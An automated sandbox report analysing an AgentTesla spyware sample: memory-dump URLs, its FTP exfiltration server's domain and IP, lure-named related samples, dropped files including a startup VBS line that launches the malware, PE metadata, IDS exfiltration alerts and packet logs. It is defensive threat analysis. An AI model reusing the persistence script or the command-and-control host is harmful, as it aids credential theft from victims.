                          https://stackoverflow.com/q/14436606/23354O65887cvz7.exe, 00000000.00000002.2034394668.0000000002BAF000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002D71000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://account.dyn.com/O65887cvz7.exe, 00000000.00000002.2034394668.0000000002EF8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003D68000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2167823876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.000000000302C000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003D55000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://github.com/mgravell/protobuf-netJO65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E3B000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameO65887cvz7.exe, 00000000.00000002.2034394668.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InnerException.exe, 00000004.00000002.2170960789.0000000002F69000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/11564914/23354;O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://stackoverflow.com/q/2152978/23354O65887cvz7.exe, 00000000.00000002.2051151028.0000000003B41000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2051151028.0000000003C88000.00000004.00000800.00020000.00000000.sdmp, O65887cvz7.exe, 00000000.00000002.2054246652.0000000005620000.00000004.08000000.00040000.00000000.sdmp, InnerException.exe, 00000004.00000002.2197504041.0000000003E87000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://ftp.alternatifplastik.comInstallUtil.exe, 00000002.00000002.2179804969.00000000032CC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2179804969.00000000032BE000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.000000000260C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.3286051641.00000000025FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      5.2.84.236
                                      ftp.alternatifplastik.comTurkey
                                      3188ALASTYRTRtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1549420
                                      Start date and time:2024-11-05 16:13:54 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 9s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:8
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:O65887cvz7.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94.exe
                                      Detection:MAL
                                      Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@1/1
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 97%
                                      • Number of executed functions: 219
                                      • Number of non-executed functions: 15
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target InnerException.exe, PID 5080 because it is empty
                                      • Execution Graph export aborted for target O65887cvz7.exe, PID 6616 because it is empty
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: O65887cvz7.exe
                                      TimeTypeDescription
                                      16:14:47AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnerException.vbs
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      5.2.84.236Request for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                        AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                            GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                              Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                  PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                    inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                      PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                        Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ftp.alternatifplastik.comRequest for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          ALASTYRTRRequest for Quotation-537262227-04.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          AYV0eq1Gyc.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          GEFA-Order 232343-68983689.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          Kuwait Offer48783929281-BZ2.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_7862679238279-GITTERSTAR-UUE-EUROPE-UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          PO_9876563647-FLOWTRONIX (FT)UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          Richardson Electronics, LTD. PRD10221301UUE.exeGet hashmaliciousAgentTeslaBrowse
                                                          • 5.2.84.236
                                                          No context
                                                          No context
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):1211392
                                                          Entropy (8bit):7.848748414848261
                                                          Encrypted:false
                                                          SSDEEP:24576:YtRjwkfngUIZzFwjcD5tH21r1o2LOGYca1Ip:mcEUxFwjwb0ho2XYC
                                                          MD5:7059C9FAE0E7595BF454796551C79DAB
                                                          SHA1:EF9D22E79DD8F6482C1E1B6C285555B23026575E
                                                          SHA-256:F6C07C1F1B936AC8DA62B2A68392634053D0B39C2DA4C7BA98E7B7E0AE9FBF94
                                                          SHA-512:7696EF0E5063CAA138A2AE832A498E62C19A33626194CDEB31D0159D6E86636BB494DB461800FE5F8A7D014E607D3679EA74D54E8465322019EA22059BD6C218
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: Avira, Detection: 100%
                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                          • Antivirus: ReversingLabs, Detection: 75%
                                                          Reputation:low
                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..g.................r..........N.... ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text...Tq... ...r.................. ..`.rsrc................t..............@..@.reloc...............z..............@..B................0.......H...........D...........Lj...$...........................................0..........(....*.*.(....*..0../.........(....}.......}......|......(...+..|....(....*..(....*..0..].........8.....(..........&......,......&................}.....|.....(............}.....|.....(....*....(...................!..................6.|.....(....*...0.......... .l..(....(..... /m..(....(.....(....o.....s........o......s...........s............io......o.......'..,...o.......,...o......,..o.....&
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:modified
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Reputation:high, very likely benign file
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Users\user\Desktop\O65887cvz7.exe
                                                          File Type:ASCII text, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):90
                                                          Entropy (8bit):4.7652159135119065
                                                          Encrypted:false
                                                          SSDEEP:3:FER/n0eFHHoUkh4EaKC51XYG+LNHHHn:FER/lFHI9aZ51Xr01
                                                          MD5:596C834DE3933F141DD5BF4A5293D3F7
                                                          SHA1:2B261BFA86E7AC65C0CD112641587F62F995DCD8
                                                          SHA-256:6858D4D00C56F9CE159BCF47BF3AA1FDB8EEAE0282F23BF06F508EDF994E6344
                                                          SHA-512:624D574ED8EFE5CD226F9DFBE73A062265AAA1F7F2358899EBF23E7B7CC0BA2DB8542F87E9A1032AFBB845DBFCFEC5285A6E11F64ED989D7C1C4AD4DDB970AC7
                                                          Malicious:true
                                                          Reputation:low
                                                          Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\InnerException.exe"""
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):7.848748414848261
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          • DOS Executable Generic (2002/1) 0.01%
                                                          File name:O65887cvz7.exe
                                                          File size:1'211'392 bytes
                                                          MD5:7059c9fae0e7595bf454796551c79dab
                                                          SHA1:ef9d22e79dd8f6482c1e1b6c285555b23026575e
                                                          SHA256:f6c07c1f1b936ac8da62b2a68392634053d0b39c2da4c7ba98e7b7e0ae9fbf94
                                                          SHA512:7696ef0e5063caa138a2ae832a498e62c19a33626194cdeb31d0159d6e86636bb494db461800fe5f8a7d014e607d3679ea74d54e8465322019ea22059bd6c218
                                                          SSDEEP:24576:YtRjwkfngUIZzFwjcD5tH21r1o2LOGYca1Ip:mcEUxFwjwb0ho2XYC
                                                          TLSH:224501007688C67BD21D53F6C5A3A48DEBE0826DF35EE3DB7C8C64F829017A1A42565F
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..g.................r..........N.... ........@.. ....................................`................................
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x52914e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x670E8663 [Tue Oct 15 15:12:35 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          NameVirtual AddressVirtual Size Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x1290f80x53.text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x12a0000x600.rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x12c0000xc.reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                          .text0x20000x1271540x1272001b50792ce42b050b17c8ae6b8c87c901False0.8945271137759424data7.853075047144905IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc0x12a0000x6000x6002f619f09d30c478af9ae991d7555d9c5False0.4134114583333333data4.027780233263417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc0x12c0000xc0x2009edea39cead5bdd0dd9a4c90f901546cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                          RT_VERSION0x12a0a00x2fcdata0.43848167539267013
                                                          RT_MANIFEST0x12a39c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                          DLLImport
                                                          mscoree.dll_CorExeMain
                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                          2024-11-05T16:14:49.414192+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5497045.2.84.23621TCP
                                                          2024-11-05T16:14:50.253913+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497055.2.84.23658644TCP
                                                          2024-11-05T16:14:50.259852+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497055.2.84.23658644TCP
                                                          2024-11-05T16:15:02.464005+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.5497065.2.84.23621TCP
                                                          2024-11-05T16:15:03.287183+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497095.2.84.23659913TCP
                                                          2024-11-05T16:15:03.294837+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.5497095.2.84.23659913TCP
                                                          2024-11-05T16:15:03.349715+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549707TCP
                                                          2024-11-05T16:15:41.776869+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549873TCP
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 5, 2024 16:14:46.730859995 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:46.740051985 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:46.740123034 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:47.557940960 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:47.558146954 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:47.563172102 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:47.851866961 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:47.852010965 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:47.857058048 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.224853992 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.227514982 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:48.232747078 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.520653963 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.520804882 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:48.525922060 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.815012932 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:48.816781998 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:48.822128057 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:49.110512018 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:49.110735893 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:49.116910934 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:49.405493021 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:49.406189919 CET4970558644192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:49.414061069 CET58644497055.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:49.414141893 CET4970558644192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:49.414191961 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:49.421231985 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:50.253566027 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:50.253912926 CET4970558644192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:50.253957987 CET4970558644192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:50.258848906 CET58644497055.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:50.259773016 CET58644497055.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:50.259851933 CET4970558644192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:50.307451963 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:50.547862053 CET21497045.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:50.590223074 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:59.830338955 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:14:59.835294008 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:14:59.835366964 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:00.516264915 CET4970421192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:00.649292946 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:00.649571896 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:00.655654907 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:00.964030981 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:00.964308023 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:00.969306946 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.274818897 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.276519060 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:01.281686068 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.566062927 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.566447973 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:01.571623087 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.856513977 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:01.860585928 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:01.865963936 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:02.163722992 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:02.165029049 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:02.170296907 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:02.456311941 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:02.457061052 CET4970959913192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:02.463871002 CET59913497095.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:02.463947058 CET4970959913192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:02.464004993 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:02.469640970 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:03.286788940 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:03.287183046 CET4970959913192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:03.287266970 CET4970959913192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:03.292345047 CET59913497095.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:03.294768095 CET59913497095.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:03.294836998 CET4970959913192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:03.338773966 CET4970621192.168.2.55.2.84.236
                                                          Nov 5, 2024 16:15:03.579176903 CET21497065.2.84.236192.168.2.5
                                                          Nov 5, 2024 16:15:03.620071888 CET4970621192.168.2.55.2.84.236
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Nov 5, 2024 16:14:46.618217945 CET5828753192.168.2.51.1.1.1
                                                          Nov 5, 2024 16:14:46.722846985 CET53582871.1.1.1192.168.2.5
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Nov 5, 2024 16:14:46.618217945 CET192.168.2.51.1.1.10x3d17Standard query (0)ftp.alternatifplastik.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Nov 5, 2024 16:14:46.722846985 CET1.1.1.1192.168.2.50x3d17No error (0)ftp.alternatifplastik.com5.2.84.236A (IP address)IN (0x0001)false
                                                          TimestampSource PortDest PortSource IPDest IPCommands
